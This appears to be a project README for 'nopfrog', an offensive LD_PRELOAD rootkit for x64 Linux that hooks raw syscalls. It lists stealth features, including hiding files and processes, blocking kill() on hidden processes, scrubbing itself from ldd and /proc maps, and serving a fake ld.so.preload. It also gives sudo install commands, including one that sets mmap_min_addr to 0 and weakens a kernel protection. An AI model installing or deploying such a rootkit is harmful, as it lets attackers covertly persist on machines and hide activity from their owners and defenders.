nopfrog is a simple LD_PRELOAD rootkti for x64 Linux that uses the binary rewriting method outlined in zpoline to exhaustively hook syscalls. Unlike most LD_PRELOAD rootkits that hook the glibc syscall wrappers and hope for the best,
72F2
nopfrog can intercept and modify all raw syscalls from both statically and dynamically linked programs, without ptrace, changing the target's source, recompiling the kernel or inserting an LKM.
WORK IN PROGRESS!
- File hiding
Hooks
openat()andgetdents64()to hide files containing a magic string in their name (i.e__pwned__a.txt) - Process hiding
- Hooks
getdents64()to hide processes with magic strings in their names fromps,top, etc. - Hooks
kill()to prevent victim from terminating hidden procs
- Hooks
- Stealth
- Filters rootkit shared objects from
lddoutput,/proc/<pid>/mapsand/proc/<pid>/smaps - Backs up existing
/etc/ld.so.preloadfile and serves fake one to user
- Filters rootkit shared objects from
- Anti-RE
- XORs out (most) sensitive strings and cleans memory
- Hiding files and processes by GID (in progress)
- Anti-VM
- Easy setup and install scripts (in progress)
- Network hiding
git clone --recursive https://github.com/mad-cat-lon/nopfrog
cd nopfrog
sudo ./easy_install.sh
Set /proc/sys/vm/mmap_min_addr to 0
sudo sh -c "echo 0 > /proc/sys/vm/mmap_min_addr"
LIBZPHOOK=./nopfrog.so LD_PRELOAD=./libzpoline.so [program you wish to run]